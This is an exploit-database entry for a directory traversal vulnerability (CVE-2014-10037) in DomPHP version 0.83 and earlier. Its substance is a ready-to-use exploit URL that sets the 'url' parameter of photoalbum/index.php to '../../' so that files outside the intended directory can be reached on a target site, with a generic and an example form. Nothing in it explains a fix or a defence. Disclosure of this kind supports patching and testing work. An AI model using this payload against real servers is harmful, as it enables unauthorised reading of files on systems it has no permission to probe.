DomPHP 0.83 - Local Directory Traversal



EKU-ID: 35880 CVE: OSVDB-102204;CVE-2014-10037 OSVDB-ID:
Author: Houssamix Published: 2014-01-12 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


-------------------------------------------------------------
DomPHP <= v0.83 Local Directory Traversal Vulnerability
-------------------------------------------------------------

= Author : Houssamix
= Script : DomPHP <= v0.83

= Download : http://www.domphp.com/download/

= BUG :  Local Directory Traversal Vulnerability

= Exploit :
http://[target]/photoalbum/index.php?urlancien=&url=[Directory]

Exemple :
http://target.com/photoalbum/index.php?urlancien=&url=../../